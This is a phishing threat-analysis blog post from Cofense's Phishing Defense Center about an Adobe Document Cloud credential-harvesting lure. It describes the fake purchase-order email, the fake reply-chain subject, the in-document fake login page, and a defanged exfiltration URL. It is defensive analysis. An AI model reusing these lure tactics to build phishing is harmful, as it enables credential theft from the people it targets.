By Zachary Bailey, Cofense Phishing Defense Center
The Cofense Phishing Defense Center (PDC) has seen the rise of threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted.
Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to include a purchase order with encryption via the Adobe Document Cloud. In the email, Adobe is just one of several components of the phish. It builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file – or download Acrobat Reader to view it instead.
Figure 1: Email Body
This email appears to be a forwarded message, as though the recipient is expecting it – FW: Purchase Order 3500250780 as the subject, which also includes the name of the organization sending the PO. A common tactic used by threat actors is to create a fake reply chain by inserting “RE” or “FW” into the subject line to trick the recipient into thinking it is a response to a conversation they initiated or were involved in.
Even though the address is clearly from a Gmail domain, it is not an uncommon practice for work-related emails to be shared between personal and corporate accounts.
The email is rather informative, listing the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not urged to sign in but are presented an alternative option that would not put their credentials at risk. The only urgency is regarding “with immediate effect please ensure all invoices are addressed as below”, but that is legitimate information regarding how to address the invoice.
Figure 2: Step 1 of Attack
When the document is inspected by the recipient, its contents are not immediately known. A popup message will cover up the assets being loaded in, which will be read before proceeding. This is not hosted on a website, so checking the URL will not immediately tip off users that something is amiss. To them, they are just viewing a file on their computer. The wording of the popup is “This document is electronically encrypted to the receiver’s email”, which is a strange way of saying that the document can only be unlocked by the recipient. If a user is not familiar with technical terms, it could still sound legitimate to them, but that should be the first hint something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more noticeable tip off that this form wants their login information.
Figure 3: Step 2 of Attack
After the user clicks through to access the login page, a full webpage appears that looks like the Adobe Document Cloud site. This is still occurring inside of the downloaded document, and the only way to analyze where the form is from – without pressing “sign in” – is to inspect the code itself. To verify where the login information is going, we pulled up the network traffic and sent a request through. Our information is now going to “infiniteworks[.]net/IDI/high.php”, which is not a part of Adobe.
Figure 4: Final Redirect of Phish
After exposing their Adobe account credentials to the attacker, the victim is redirected to a new webpage. If they check the URL again, they will discover that they are now in the actual Adobe website. With no new document being unencrypted, they should be fully aware that something is wrong. They should alert their security team immediately.
Indicators of Compromise